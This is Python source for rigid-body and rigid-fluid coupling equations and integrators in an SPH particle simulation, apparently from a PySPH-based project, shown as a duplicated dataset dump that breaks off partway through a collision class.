Implemented from Akinci et al. http://dx.doi.org/10.1145/2185520.2185558
Use this with the fluid as a destination and body as source.
"""
def __init__(self, dest, sources, rho0, nu):
self.nu = nu
self.rho0 = rho0
super(ViscosityRigidBody, self).__init__(dest, sources)
def loop(self, d_idx, d_m, d_au, d_av, d_aw, d_rho,
s_idx, s_V, s_fx, s_fy, s_fz,
EPS, VIJ, XIJ, R2IJ, DWIJ):
phi_b = self.rho0/(s_V[s_idx]*d_rho[d_idx])
vijdotxij = min(VIJ[0]*XIJ[0] + VIJ[1]*XIJ[1] + VIJ[2]*XIJ[2], 0.0)
fac = self.nu*phi_b*vijdotxij/(R2IJ + EPS)
ax = fac*DWIJ[0]
ay = fac*DWIJ[1]
az = fac*DWIJ[2]
d_au[d_idx] += ax
d_av[d_idx] += ay
d_aw[d_idx] += az
s_fx[s_idx] += -d_m[d_idx]*ax
s_fy[s_idx] += -d_m[d_idx]*ay
s_fz[s_idx] += -d_m[d_idx]*az
class PressureRigidBody(Equation):
"""The pressure acceleration on the fluid/solid due to a boundary.
Implemented from Akinci et al. http://dx.doi.org/10.1145/2185520.2185558
Use this with the fluid as a destination and body as source.
"""
def __init__(self, dest, sources, rho0):
self.rho0 = rho0
super(PressureRigidBody, self).__init__(dest, sources)
def loop(self, d_idx, d_m, d_rho, d_au, d_av, d_aw, d_p,
s_idx, s_V, s_fx, s_fy, s_fz, DWIJ):
rho1 = 1.0/d_rho[d_idx]
fac = -d_p[d_idx]*rho1*rho1*self.rho0/s_V[s_idx]
ax = fac*DWIJ[0]
ay = fac*DWIJ[1]
az = fac*DWIJ[2]
d_au[d_idx] += ax
d_av[d_idx] += ay
d_aw[d_idx] += az
s_fx[s_idx] += -d_m[d_idx]*ax
s_fy[s_idx] += -d_m[d_idx]*ay
s_fz[s_idx] += -d_m[d_idx]*az
class AkinciRigidFluidCoupling(Equation):
"""Force between a solid sphere and a SPH fluid particle. This is
implemented using Akinci's[1] force and additional force from solid
bodies pressure which is implemented by Liu[2]
[1]'Versatile Rigid-Fluid Coupling for Incompressible SPH'
URL: https://graphics.ethz.ch/~sobarbar/papers/Sol12/Sol12.pdf
[2]A 3D Simulation of a Moving Solid in Viscous Free-Surface Flows by
Coupling SPH and DEM
https://doi.org/10.1155/2017/3174904
Note: Here forces for both the phases are added at once.
Please make sure that this force is applied only once
for both the particle properties.
"""
def __init__(self, dest, sources, fluid_rho=1000):
super(AkinciRigidFluidCoupling, self).__init__(dest, sources)
self.fluid_rho = fluid_rho
def loop(self, d_idx, d_m, d_rho, d_au, d_av, d_aw, d_p,
s_idx, s_V, s_fx, s_fy, s_fz, DWIJ, s_m, s_p, s_rho):
psi = s_V[s_idx] * self.fluid_rho
_t1 = 2 * d_p[d_idx] / (d_rho[d_idx]**2)
d_au[d_idx] += -psi * _t1 * DWIJ[0]
d_av[d_idx] += -psi * _t1 * DWIJ[1]
d_aw[d_idx] += -psi * _t1 * DWIJ[2]
s_fx[s_idx] += d_m[d_idx] * psi * _t1 * DWIJ[0]
s_fy[s_idx] += d_m[d_idx] * psi * _t1 * DWIJ[1]
s_fz[s_idx] += d_m[d_idx] * psi * _t1 * DWIJ[2]
class LiuFluidForce(Equation):
"""Force between a solid sphere and a SPH fluid particle. This is
implemented using Akinci's[1] force and additional force from solid
bodies pressure which is implemented by Liu[2]
[1]'Versatile Rigid-Fluid Coupling for Incompressible SPH'
URL: https://graphics.ethz.ch/~sobarbar/papers/Sol12/Sol12.pdf
[2]A 3D Simulation of a Moving Solid in Viscous Free-Surface Flows by
Coupling SPH and DEM
https://doi.org/10.1155/2017/3174904
Note: Here forces for both the phases are added at once.
Please make sure that this force is applied only once
for both the particle properties.
"""
def __init__(self, dest, sources):
super(LiuFluidForce, self).__init__(dest, sources)
def loop(self, d_idx, d_m, d_rho, d_au, d_av, d_aw, d_p,
s_idx, s_V, s_fx, s_fy, s_fz, DWIJ, s_m, s_p, s_rho):
_t1 = s_p[s_idx] / (s_rho[s_idx]**2) + d_p[d_idx] / (d_rho[d_idx]**2)
d_au[d_idx] += -s_m[s_idx] * _t1 * DWIJ[0]
d_av[d_idx] += -s_m[s_idx] * _t1 * DWIJ[1]
d_aw[d_idx] += -s_m[s_idx] * _t1 * DWIJ[2]
s_fx[s_idx] += d_m[d_idx] * s_m[s_idx] * _t1 * DWIJ[0]
s_fy[s_idx] += d_m[d_idx] * s_m[s_idx] * _t1 * DWIJ[1]
s_fz[s_idx] += d_m[d_idx] * s_m[s_idx] * _t1 * DWIJ[2]
class RigidBodyForceGPUGems(Equation):
"""This is inspired from
http://http.developer.nvidia.com/GPUGems3/gpugems3_ch29.html
and
BK Mishra's article on DEM
http://dx.doi.org/10.1016/S0301-7516(03)00032-2
A review of computer simulation of tumbling mills by the discrete element
method: Part I - contact mechanics
"""
def __init__(self, dest, sources, k=1.0, d=1.0, eta=1.0, kt=1.0):
"""Note that d is a factor multiplied with the "h" of the particle.
"""
self.k = k
self.d = d
self.eta = eta
self.kt = kt
super(RigidBodyForceGPUGems, self).__init__(dest, sources)
def loop(self, d_idx, d_fx, d_fy, d_fz, d_h, d_total_mass, XIJ,
RIJ, R2IJ, VIJ):
vijdotrij = VIJ[0]*XIJ[0] + VIJ[1]*XIJ[1] + VIJ[2]*XIJ[2]
if RIJ > 1e-9:
vijdotrij_r2ij = vijdotrij/R2IJ
nij_x = XIJ[0]/RIJ
nij_y = XIJ[1]/RIJ
nij_z = XIJ[2]/RIJ
else:
vijdotrij_r2ij = 0.0
nij_x = 0.0
nij_y = 0.0
nij_z = 0.0
vijt_x = VIJ[0] - vijdotrij_r2ij*XIJ[0]
vijt_y = VIJ[1] - vijdotrij_r2ij*XIJ[1]
vijt_z = VIJ[2] - vijdotrij_r2ij*XIJ[2]
d = self.d*d_h[d_idx]
fac = self.k*d_total_mass[0]/d*max(d - RIJ, 0.0)
d_fx[d_idx] += fac*nij_x - self.eta*VIJ[0] - self.kt*vijt_x
d_fy[d_idx] += fac*nij_y - self.eta*VIJ[1] - self.kt*vijt_y
d_fz[d_idx] += fac*nij_z - self.eta*VIJ[2] - self.kt*vijt_z
class RigidBodyCollision(Equation):
"""Force between two spheres is implemented using DEM contact force law.
Refer https://doi.org/10.1016/j.powtec.2011.09.019 for more
information.
Open-source MFIX-DEM software for gas–solids flows:
Part I—Verification studies .
"""
def __init__(self, dest, sources, kn=1e3, mu=0.5, en=0.8):
"""Initialise the required coefficients for force calculation.
Keyword arguments:
kn -- Normal spring stiffness (default 1e3)
mu -- friction coefficient (default 0.5)
en -- coefficient of restitution (0.8)
Given these coefficients, tangential spring stiffness, normal and
tangential damping coefficient are calculated by default.
"""
self.kn = kn
self.kt = 2. / 7. * kn
m_eff = np.pi * 0.5**2 * 1e-6 * 2120
self.gamma_n = -(2 * np.sqrt(kn * m_eff) * np.log(en)) / (
np.sqrt(np.pi**2 + np.log(en)**2))
self.gamma_t = 0.5 * self.gamma_n
self.mu = mu
super(RigidBodyCollision, self).__init__(dest, sources)
def loop(self, d_idx, d_fx, d_fy, d_fz, d_h, d_total_mass, d_rad_s,
d_tang_disp_x, d_tang_disp_y, d_tang_disp_z, d_tang_velocity_x,
d_tang_velocity_y, d_tang_velocity_z, s_idx, s_rad_s, XIJ, RIJ,
R2IJ, VIJ):
overlap = 0
if RIJ > 1e-9:
overlap = d_rad_s[d_idx] + s_rad_s[s_idx] - RIJ
if overlap > 0:
# normal vector passing from particle i to j
nij_x = -XIJ[0] / RIJ
nij_y = -XIJ[1] / RIJ
nij_z = -XIJ[2] / RIJ
# overlap speed: a scalar
vijdotnij = VIJ[0] * nij_x + VIJ[1] * nij_y + VIJ[2] * nij_z
# normal velocity
vijn_x = vijdotnij * nij_x
vijn_y = vijdotnij * nij_y
vijn_z = vijdotnij * nij_z
# normal force with conservative and dissipation part
fn_x = -self.kn * overlap * nij_x - self.gamma_n * vijn_x
fn_y = -self.kn * overlap * nij_y - self.gamma_n * vijn_y
fn_z = -self.kn * overlap * nij_z - self.gamma_n * vijn_z
# ----------------------Tangential force---------------------- #
# tangential velocity
d_tang_velocity_x[d_idx] = VIJ[0] - vijn_x
d_tang_velocity_y[d_idx] = VIJ[1] - vijn_y
d_tang_velocity_z[d_idx] = VIJ[2] - vijn_z
dtvx = d_tang_velocity_x[d_idx]
dtvy = d_tang_velocity_y[d_idx]
dtvz = d_tang_velocity_z[d_idx]
_tang = sqrt(dtvx*dtvx + dtvy*dtvy + dtvz*dtvz)
# tangential unit vector
tij_x = 0
tij_y = 0
tij_z = 0
if _tang > 0:
tij_x = d_tang_velocity_x[d_idx] / _tang
tij_y = d_tang_velocity_y[d_idx] / _tang
tij_z = d_tang_velocity_z[d_idx] / _tang
# damping force or dissipation
ft_x_d = -self.gamma_t * d_tang_velocity_x[d_idx]
ft_y_d = -self.gamma_t * d_tang_velocity_y[d_idx]
ft_z_d = -self.gamma_t * d_tang_velocity_z[d_idx]
# tangential spring force
ft_x_s = -self.kt * d_tang_disp_x[d_idx]
ft_y_s = -self.kt * d_tang_disp_y[d_idx]
ft_z_s = -self.kt * d_tang_disp_z[d_idx]
ft_x = ft_x_d + ft_x_s
ft_y = ft_y_d + ft_y_s
ft_z = ft_z_d + ft_z_s
# coulomb law
ftij = sqrt((ft_x**2) + (ft_y**2) + (ft_z**2))
fnij = sqrt((fn_x**2) + (fn_y**2) + (fn_z**2))
_fnij = self.mu * fnij
if _fnij < ftij:
ft_x = -_fnij * tij_x
ft_y = -_fnij * tij_y
ft_z = -_fnij * tij_z
d_fx[d_idx] += fn_x + ft_x
d_fy[d_idx] += fn_y + ft_y
d_fz[d_idx] += fn_z + ft_z
else:
d_tang_velocity_x[d_idx] = 0
d_tang_velocity_y[d_idx] = 0
d_tang_velocity_z[d_idx] = 0
d_tang_disp_x[d_idx] = 0
d_tang_disp_y[d_idx] = 0
d_tang_disp_z[d_idx] = 0
class RigidBodyWallCollision(Equation):
"""Force between sphere and a wall is implemented using
DEM contact force law.
Refer https://doi.org/10.1016/j.powtec.2011.09.019 for more
information.
Open-source MFIX-DEM software for gas–solids flows:
Part I—Verification studies .
"""
def __init__(self, dest, sources, kn=1e3, mu=0.5, en=0.8):
"""Initialise the required coefficients for force calculation.
Keyword arguments:
kn -- Normal spring stiffness (default 1e3)
mu -- friction coefficient (default 0.5)
en -- coefficient of restitution (0.8)
Given these coefficients, tangential spring stiffness, normal and
tangential damping coefficient are calculated by default.
"""
self.kn = kn
self.kt = 2. / 7. * kn
m_eff = np.pi * 0.5**2 * 1e-6 * 2120
self.gamma_n = -(2 * np.sqrt(kn * m_eff) * np.log(en)) / (
np.sqrt(np.pi**2 + np.log(en)**2))
print(self.gamma_n)
self.gamma_t = 0.5 * self.gamma_n
self.mu = mu
super(RigidBodyWallCollision, self).__init__(dest, sources)
def loop(self, d_idx, d_fx, d_fy, d_fz, d_h, d_total_mass, d_rad_s,
d_tang_disp_x, d_tang_disp_y, d_tang_disp_z, d_tang_velocity_x,
d_tang_velocity_y, d_tang_velocity_z, s_idx, XIJ, RIJ,
R2IJ, VIJ, s_nx, s_ny, s_nz):
# check overlap amount
overlap = d_rad_s[d_idx] - (XIJ[0] * s_nx[s_idx] + XIJ[1] *
s_ny[s_idx] + XIJ[2] * s_nz[s_idx])
if overlap > 0:
# basic variables: normal vector
nij_x = -s_nx[s_idx]
nij_y = -s_ny[s_idx]
nij_z = -s_nz[s_idx]
# overlap speed: a scalar
vijdotnij = VIJ[0] * nij_x + VIJ[1] * nij_y + VIJ[2] * nij_z
# normal velocity
vijn_x = vijdotnij * nij_x
vijn_y = vijdotnij * nij_y
vijn_z = vijdotnij * nij_z
# normal force with conservative and dissipation part
fn_x = -self.kn * overlap * nij_x - self.gamma_n * vijn_x
fn_y = -self.kn * overlap * nij_y - self.gamma_n * vijn_y
fn_z = -self.kn * overlap * nij_z - self.gamma_n * vijn_z
# ----------------------Tangential force---------------------- #
# tangential velocity
d_tang_velocity_x[d_idx] = VIJ[0] - vijn_x
d_tang_velocity_y[d_idx] = VIJ[1] - vijn_y
d_tang_velocity_z[d_idx] = VIJ[2] - vijn_z
_tang = (
(d_tang_velocity_x[d_idx]**2) + (d_tang_velocity_y[d_idx]**2) +
(d_tang_velocity_z[d_idx]**2))**(1. / 2.)
# tangential unit vector
tij_x = 0
tij_y = 0
tij_z = 0
if _tang > 0:
tij_x = d_tang_velocity_x[d_idx] / _tang
tij_y = d_tang_velocity_y[d_idx] / _tang
tij_z = d_tang_velocity_z[d_idx] / _tang
# damping force or dissipation
ft_x_d = -self.gamma_t * d_tang_velocity_x[d_idx]
ft_y_d = -self.gamma_t * d_tang_velocity_y[d_idx]
ft_z_d = -self.gamma_t * d_tang_velocity_z[d_idx]
# tangential spring force
ft_x_s = -self.kt * d_tang_disp_x[d_idx]
ft_y_s = -self.kt * d_tang_disp_y[d_idx]
ft_z_s = -self.kt * d_tang_disp_z[d_idx]
ft_x = ft_x_d + ft_x_s
ft_y = ft_y_d + ft_y_s
ft_z = ft_z_d + ft_z_s
# coulomb law
ftij = ((ft_x**2) + (ft_y**2) + (ft_z**2))**(1. / 2.)
fnij = ((fn_x**2) + (fn_y**2) + (fn_z**2))**(1. / 2.)
_fnij = self.mu * fnij
if _fnij < ftij:
ft_x = -_fnij * tij_x
ft_y = -_fnij * tij_y
ft_z = -_fnij * tij_z
d_fx[d_idx] += fn_x + ft_x
d_fy[d_idx] += fn_y + ft_y
d_fz[d_idx] += fn_z + ft_z
# print(d_fz[d_idx])
else:
d_tang_velocity_x[d_idx] = 0
d_tang_velocity_y[d_idx] = 0
d_tang_velocity_z[d_idx] = 0
d_tang_disp_x[d_idx] = 0
d_tang_disp_y[d_idx] = 0
d_tang_disp_z[d_idx] = 0
class EulerStepRigidBody(IntegratorStep):
"""Fast but inaccurate integrator. Use this for testing"""
def initialize(self):
pass
def stage1(self, d_idx, d_u, d_v, d_w, d_x, d_y, d_z,
d_omega, d_omega_dot, d_vc, d_ac, d_num_body,
dt=0.0):
_i = declare('int')
_j = declare('int')
base = declare('int')
if d_idx == 0:
for _i in range(d_num_body[0]):
base = 3*_i
for _j in range(3):
d_vc[base + _j] += d_ac[base + _j]*dt
d_omega[base + _j] += d_omega_dot[base + _j]*dt
d_x[d_idx] += dt*d_u[d_idx]
d_y[d_idx] += dt*d_v[d_idx]
d_z[d_idx] += dt*d_w[d_idx]
class RK2StepRigidBody(IntegratorStep):
def initialize(self, d_idx, d_x, d_y, d_z, d_x0, d_y0, d_z0,
d_omega, d_omega0, d_vc, d_vc0, d_num_body):
_i = declare('int')
_j = declare('int')
base = declare('int')
if d_idx == 0:
for _i in range(d_num_body[0]):
base = 3*_i
for _j in range(3):
d_vc0[base + _j] = d_vc[base + _j]
d_omega0[base + _j] = d_omega[base + _j]
d_x0[d_idx] = d_x[d_idx]
d_y0[d_idx] = d_y[d_idx]
d_z0[d_idx] = d_z[d_idx]
def stage1(self, d_idx, d_u, d_v, d_w, d_x, d_y, d_z, d_x0, d_y0, d_z0,
d_omega, d_omega_dot, d_vc, d_ac, d_omega0, d_vc0, d_num_body,
dt=0.0):
dtb2 = 0.5*dt
_i = declare('int')
j = declare('int')
base = declare('int')
if d_idx == 0:
for _i in range(d_num_body[0]):
base = 3*_i
for j in range(3):
d_vc[base + j] = d_vc0[base + j] + d_ac[base + j]*dtb2
d_omega[base + j] = (d_omega0[base + j] +
d_omega_dot[base + j]*dtb2)
d_x[d_idx] = d_x0[d_idx] + dtb2*d_u[d_idx]
d_y[d_idx] = d_y0[d_idx] + dtb2*d_v[d_idx]
d_z[d_idx] = d_z0[d_idx] + dtb2*d_w[d_idx]
def stage2(self, d_idx, d_u, d_v, d_w, d_x, d_y, d_z, d_x0, d_y0, d_z0,
d_omega, d_omega_dot, d_vc, d_ac, d_omega0, d_vc0, d_num_body,
dt=0.0):
_i = declare('int')
j = declare('int')
base = declare('int')
if d_idx == 0:
for _i in range(d_num_body[0]):
base = 3*_i
for j in range(3):
d_vc[base + j] = d_vc0[base + j] + d_ac[base + j]*dt
d_omega[base + j] = (d_omega0[base + j] +
d_omega_dot[base + j]*dt)
d_x[d_idx] = d_x0[d_idx] + dt*d_u[d_idx]
d_y[d_idx] = d_y0[d_idx] + dt*d_v[d_idx]
d_z[d_idx] = d_z0[d_idx] + dt*d_w[d_idx]
| 34.666667 | 79 | 0.531877 |
from pysph.base.reduce_array import parallel_reduce_array
from pysph.sph.equation import Equation
from pysph.sph.integrator_step import IntegratorStep
import numpy as np
import numpy
from math import sqrt
def skew(vec):
import sympy as S
x, y, z = vec[0], vec[1], vec[2]
return S.Matrix([[0, -z, y], [z, 0, -x], [-y, x, 0]])
def get_alpha_dot():
import sympy as S
ixx, iyy, izz, ixy, ixz, iyz = S.symbols("ixx, iyy, izz, ixy, ixz, iyz")
tx, ty, tz = S.symbols("tx, ty, tz")
wx, wy, wz = S.symbols('wx, wy, wz')
tau = S.Matrix([tx, ty, tz])
I = S.Matrix([[ixx, ixy, ixz], [ixy, iyy, iyz], [ixz, iyz, izz]])
w = S.Matrix([wx, wy, wz])
Iinv = I.inv()
Iinv.simplify()
res = Iinv*(tau - w.cross(I*w))
res.simplify()
syms, result = S.cse(res, symbols=S.numbered_symbols('tmp'))
for lhs, rhs in syms:
print("%s = %s" % (lhs, rhs))
for i in range(3):
print("omega_dot[%d] =" % i, result[0][i])
def get_torque():
import sympy as S
x, y, z, fx, fy, fz = S.symbols("x, y, z, fx, fy, fz")
R = S.Matrix([x, y, z])
F = S.Matrix([fx, fy, fz])
print("Torque:", R.cross(F))
cx, cy, cz = S.symbols('cx, cy, cz')
d = S.Matrix([cx, cy, cz])
print("c_m x f = ", d.cross(F))
wx, wy, wz = S.symbols('wx, wy, wz')
rx, ry, rz = S.symbols('rx, ry, rz')
w = S.Matrix([wx, wy, wz])
r = S.Matrix([rx, ry, rz])
print("w x r = %s" % w.cross(r))
def declare(*args): pass
class RigidBodyMoments(Equation):
def reduce(self, dst, t, dt):
nbody = declare('int')
i = declare('int')
base_mi = declare('int')
base = declare('int')
nbody = dst.num_body[0]
if dst.gpu:
dst.gpu.pull('omega', 'x', 'y', 'z', 'fx', 'fy', 'fz')
d_mi = declare('object')
m = declare('object')
x = declare('object')
y = declare('object')
z = declare('object')
fx = declare('object')
fy = declare('object')
fz = declare('object')
d_mi = dst.mi
cond = declare('object')
for i in range(nbody):
cond = dst.body_id == i
base = i*16
m = dst.m[cond]
x = dst.x[cond]
y = dst.y[cond]
z = dst.z[cond]
d_mi[base + 0] = numpy.sum(m)
d_mi[base + 1] = numpy.sum(m*x)
d_mi[base + 2] = numpy.sum(m*y)
d_mi[base + 3] = numpy.sum(m*z)
d_mi[base + 4] = numpy.sum(m*(y*y + z*z))
d_mi[base + 5] = numpy.sum(m*(x*x + z*z))
d_mi[base + 6] = numpy.sum(m*(x*x + y*y))
d_mi[base + 7] = -numpy.sum(m*x*y)
d_mi[base + 8] = -numpy.sum(m*x*z)
d_mi[base + 9] = -numpy.sum(m*y*z)
fx = dst.fx[cond]
fy = dst.fy[cond]
fz = dst.fz[cond]
d_mi[base + 10] = numpy.sum(fx)
d_mi[base + 11] = numpy.sum(fy)
d_mi[base + 12] = numpy.sum(fz)
d_mi[base + 13] = numpy.sum(y*fz - z*fy)
d_mi[base + 14] = numpy.sum(z*fx - x*fz)
d_mi[base + 15] = numpy.sum(x*fy - y*fx)
d_mi[:] = parallel_reduce_array(dst.mi)
for i in range(nbody):
base_mi = i*16
base = i*3
m = d_mi[base_mi + 0]
dst.total_mass[i] = m
cx = d_mi[base_mi + 1]/m
cy = d_mi[base_mi + 2]/m
cz = d_mi[base_mi + 3]/m
dst.cm[base + 0] = cx
dst.cm[base + 1] = cy
dst.cm[base + 2] = cz
ixx = d_mi[base_mi + 4] - (cy*cy + cz*cz)*m
iyy = d_mi[base_mi + 5] - (cx*cx + cz*cz)*m
izz = d_mi[base_mi + 6] - (cx*cx + cy*cy)*m
ixy = d_mi[base_mi + 7] + cx*cy*m
ixz = d_mi[base_mi + 8] + cx*cz*m
iyz = d_mi[base_mi + 9] + cy*cz*m
d_mi[base_mi + 0] = ixx
d_mi[base_mi + 1] = ixy
d_mi[base_mi + 2] = ixz
d_mi[base_mi + 3] = ixy
d_mi[base_mi + 4] = iyy
d_mi[base_mi + 5] = iyz
d_mi[base_mi + 6] = ixz
d_mi[base_mi + 7] = iyz
d_mi[base_mi + 8] = izz
fx = d_mi[base_mi + 10]
fy = d_mi[base_mi + 11]
fz = d_mi[base_mi + 12]
dst.force[base + 0] = fx
dst.force[base + 1] = fy
dst.force[base + 2] = fz
dst.ac[base + 0] = fx/m
dst.ac[base + 1] = fy/m
dst.ac[base + 2] = fz/m
tx = d_mi[base_mi + 13]
ty = d_mi[base_mi + 14]
tz = d_mi[base_mi + 15]
tx -= cy*fz - cz*fy
ty -= -cx*fz + cz*fx
tz -= cx*fy - cy*fx
dst.torque[base + 0] = tx
dst.torque[base + 1] = ty
dst.torque[base + 2] = tz
wx = dst.omega[base + 0]
wy = dst.omega[base + 1]
wz = dst.omega[base + 2]
tmp0 = iyz**2
tmp1 = ixy**2
tmp2 = ixz**2
tmp3 = ixx*iyy
tmp4 = ixy*ixz
tmp5 = 1./(ixx*tmp0 + iyy*tmp2 - 2*iyz*tmp4 + izz*tmp1 - izz*tmp3)
tmp6 = ixy*izz - ixz*iyz
tmp7 = ixz*wx + iyz*wy + izz*wz
tmp8 = ixx*wx + ixy*wy + ixz*wz
tmp9 = tmp7*wx - tmp8*wz + ty
tmp10 = ixy*iyz - ixz*iyy
tmp11 = ixy*wx + iyy*wy + iyz*wz
tmp12 = -tmp11*wx + tmp8*wy + tz
tmp13 = tmp11*wz - tmp7*wy + tx
tmp14 = ixx*iyz - tmp4
dst.omega_dot[base + 0] = tmp5*(-tmp10*tmp12 -
tmp13*(iyy*izz - tmp0) + tmp6*tmp9)
dst.omega_dot[base + 1] = tmp5*(tmp12*tmp14 +
tmp13*tmp6 - tmp9*(ixx*izz - tmp2))
dst.omega_dot[base + 2] = tmp5*(-tmp10*tmp13 -
tmp12*(-tmp1 + tmp3) + tmp14*tmp9)
if dst.gpu:
dst.gpu.push(
'total_mass', 'mi', 'cm', 'force', 'ac', 'torque',
'omega_dot'
)
class RigidBodyMotion(Equation):
def initialize(self, d_idx, d_x, d_y, d_z, d_u, d_v, d_w,
d_cm, d_vc, d_ac, d_omega, d_body_id):
base = declare('int')
base = d_body_id[d_idx]*3
wx = d_omega[base + 0]
wy = d_omega[base + 1]
wz = d_omega[base + 2]
rx = d_x[d_idx] - d_cm[base + 0]
ry = d_y[d_idx] - d_cm[base + 1]
rz = d_z[d_idx] - d_cm[base + 2]
d_u[d_idx] = d_vc[base + 0] + wy*rz - wz*ry
d_v[d_idx] = d_vc[base + 1] + wz*rx - wx*rz
d_w[d_idx] = d_vc[base + 2] + wx*ry - wy*rx
class BodyForce(Equation):
def __init__(self, dest, sources, gx=0.0, gy=0.0, gz=0.0):
self.gx = gx
self.gy = gy
self.gz = gz
super(BodyForce, self).__init__(dest, sources)
def initialize(self, d_idx, d_m, d_fx, d_fy, d_fz, d_num_body, d_mi):
d_fx[d_idx] = d_m[d_idx]*self.gx
d_fy[d_idx] = d_m[d_idx]*self.gy
d_fz[d_idx] = d_m[d_idx]*self.gz
class SummationDensityBoundary(Equation):
def __init__(self, dest, sources, fluid_rho=1000.0):
self.fluid_rho = fluid_rho
super(SummationDensityBoundary, self).__init__(dest, sources)
def loop(self, d_idx, d_rho, s_idx, s_m, s_V, WIJ):
d_rho[d_idx] += self.fluid_rho * s_V[s_idx] * WIJ
class NumberDensity(Equation):
def initialize(self, d_idx, d_V):
d_V[d_idx] = 0.0
def loop(self, d_idx, d_V, WIJ):
d_V[d_idx] += WIJ
class SummationDensityRigidBody(Equation):
def __init__(self, dest, sources, rho0):
self.rho0 = rho0
super(SummationDensityRigidBody, self).__init__(dest, sources)
def initialize(self, d_idx, d_rho):
d_rho[d_idx] = 0.0
def loop(self, d_idx, d_rho, s_idx, s_V, WIJ):
d_rho[d_idx] += self.rho0/s_V[s_idx]*WIJ
class ViscosityRigidBody(Equation):
def __init__(self, dest, sources, rho0, nu):
self.nu = nu
self.rho0 = rho0
super(ViscosityRigidBody, self).__init__(dest, sources)
def loop(self, d_idx, d_m, d_au, d_av, d_aw, d_rho,
s_idx, s_V, s_fx, s_fy, s_fz,
EPS, VIJ, XIJ, R2IJ, DWIJ):
phi_b = self.rho0/(s_V[s_idx]*d_rho[d_idx])
vijdotxij = min(VIJ[0]*XIJ[0] + VIJ[1]*XIJ[1] + VIJ[2]*XIJ[2], 0.0)
fac = self.nu*phi_b*vijdotxij/(R2IJ + EPS)
ax = fac*DWIJ[0]
ay = fac*DWIJ[1]
az = fac*DWIJ[2]
d_au[d_idx] += ax
d_av[d_idx] += ay
d_aw[d_idx] += az
s_fx[s_idx] += -d_m[d_idx]*ax
s_fy[s_idx] += -d_m[d_idx]*ay
s_fz[s_idx] += -d_m[d_idx]*az
class PressureRigidBody(Equation):
def __init__(self, dest, sources, rho0):
self.rho0 = rho0
super(PressureRigidBody, self).__init__(dest, sources)
def loop(self, d_idx, d_m, d_rho, d_au, d_av, d_aw, d_p,
s_idx, s_V, s_fx, s_fy, s_fz, DWIJ):
rho1 = 1.0/d_rho[d_idx]
fac = -d_p[d_idx]*rho1*rho1*self.rho0/s_V[s_idx]
ax = fac*DWIJ[0]
ay = fac*DWIJ[1]
az = fac*DWIJ[2]
d_au[d_idx] += ax
d_av[d_idx] += ay
d_aw[d_idx] += az
s_fx[s_idx] += -d_m[d_idx]*ax
s_fy[s_idx] += -d_m[d_idx]*ay
s_fz[s_idx] += -d_m[d_idx]*az
class AkinciRigidFluidCoupling(Equation):
def __init__(self, dest, sources, fluid_rho=1000):
super(AkinciRigidFluidCoupling, self).__init__(dest, sources)
self.fluid_rho = fluid_rho
def loop(self, d_idx, d_m, d_rho, d_au, d_av, d_aw, d_p,
s_idx, s_V, s_fx, s_fy, s_fz, DWIJ, s_m, s_p, s_rho):
psi = s_V[s_idx] * self.fluid_rho
_t1 = 2 * d_p[d_idx] / (d_rho[d_idx]**2)
d_au[d_idx] += -psi * _t1 * DWIJ[0]
d_av[d_idx] += -psi * _t1 * DWIJ[1]
d_aw[d_idx] += -psi * _t1 * DWIJ[2]
s_fx[s_idx] += d_m[d_idx] * psi * _t1 * DWIJ[0]
s_fy[s_idx] += d_m[d_idx] * psi * _t1 * DWIJ[1]
s_fz[s_idx] += d_m[d_idx] * psi * _t1 * DWIJ[2]
class LiuFluidForce(Equation):
def __init__(self, dest, sources):
super(LiuFluidForce, self).__init__(dest, sources)
def loop(self, d_idx, d_m, d_rho, d_au, d_av, d_aw, d_p,
s_idx, s_V, s_fx, s_fy, s_fz, DWIJ, s_m, s_p, s_rho):
_t1 = s_p[s_idx] / (s_rho[s_idx]**2) + d_p[d_idx] / (d_rho[d_idx]**2)
d_au[d_idx] += -s_m[s_idx] * _t1 * DWIJ[0]
d_av[d_idx] += -s_m[s_idx] * _t1 * DWIJ[1]
d_aw[d_idx] += -s_m[s_idx] * _t1 * DWIJ[2]
s_fx[s_idx] += d_m[d_idx] * s_m[s_idx] * _t1 * DWIJ[0]
s_fy[s_idx] += d_m[d_idx] * s_m[s_idx] * _t1 * DWIJ[1]
s_fz[s_idx] += d_m[d_idx] * s_m[s_idx] * _t1 * DWIJ[2]
class RigidBodyForceGPUGems(Equation):
def __init__(self, dest, sources, k=1.0, d=1.0, eta=1.0, kt=1.0):
self.k = k
self.d = d
self.eta = eta
self.kt = kt
super(RigidBodyForceGPUGems, self).__init__(dest, sources)
def loop(self, d_idx, d_fx, d_fy, d_fz, d_h, d_total_mass, XIJ,
RIJ, R2IJ, VIJ):
vijdotrij = VIJ[0]*XIJ[0] + VIJ[1]*XIJ[1] + VIJ[2]*XIJ[2]
if RIJ > 1e-9:
vijdotrij_r2ij = vijdotrij/R2IJ
nij_x = XIJ[0]/RIJ
nij_y = XIJ[1]/RIJ
nij_z = XIJ[2]/RIJ
else:
vijdotrij_r2ij = 0.0
nij_x = 0.0
nij_y = 0.0
nij_z = 0.0
vijt_x = VIJ[0] - vijdotrij_r2ij*XIJ[0]
vijt_y = VIJ[1] - vijdotrij_r2ij*XIJ[1]
vijt_z = VIJ[2] - vijdotrij_r2ij*XIJ[2]
d = self.d*d_h[d_idx]
fac = self.k*d_total_mass[0]/d*max(d - RIJ, 0.0)
d_fx[d_idx] += fac*nij_x - self.eta*VIJ[0] - self.kt*vijt_x
d_fy[d_idx] += fac*nij_y - self.eta*VIJ[1] - self.kt*vijt_y
d_fz[d_idx] += fac*nij_z - self.eta*VIJ[2] - self.kt*vijt_z
class RigidBodyCollision(Equation):
def __init__(self, dest, sources, kn=1e3, mu=0.5, en=0.8):
self.kn = kn
self.kt = 2. / 7. * kn
m_eff = np.pi * 0.5**2 * 1e-6 * 2120
self.gamma_n = -(2 * np.sqrt(kn * m_eff) * np.log(en)) / (
np.sqrt(np.pi**2 + np.log(en)**2))
self.gamma_t = 0.5 * self.gamma_n
self.mu = mu
super(RigidBodyCollision, self).__init__(dest, sources)
def loop(self, d_idx, d_fx, d_fy, d_fz, d_h, d_total_mass, d_rad_s,
d_tang_disp_x, d_tang_disp_y, d_tang_disp_z, d_tang_velocity_x,
d_tang_velocity_y, d_tang_velocity_z, s_idx, s_rad_s, XIJ, RIJ,
R2IJ, VIJ):
overlap = 0
if RIJ > 1e-9:
overlap = d_rad_s[d_idx] + s_rad_s[s_idx] - RIJ
if overlap > 0:
nij_x = -XIJ[0] / RIJ
nij_y = -XIJ[1] / RIJ
nij_z = -XIJ[2] / RIJ
